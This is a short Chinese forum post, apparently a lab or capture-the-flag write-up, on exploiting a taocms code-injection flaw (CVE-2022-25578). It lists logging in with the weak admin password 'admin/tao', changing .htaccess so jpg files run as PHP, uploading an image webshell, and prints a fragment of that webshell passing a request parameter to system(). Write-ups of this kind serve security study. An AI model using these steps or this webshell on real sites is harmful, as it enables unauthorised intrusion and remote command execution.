论坛首页 > 学习杂记

打靶之路_________taocms 代码注入(CVE-2022-25578)

RE   ·   发表于 2022-06-23 16:31:12   ·   学习杂记

1.弱口令登入后台:admin/tao

2.编辑.htaccess文件,改成可jpg文件可解析成php


3.上传图片马

"; $cmd =   ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?&gt;

4.执行cmd命令得到flag

打赏我,让我更有动力~

0 条回复   |  直到 2022-6-23 | 400 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.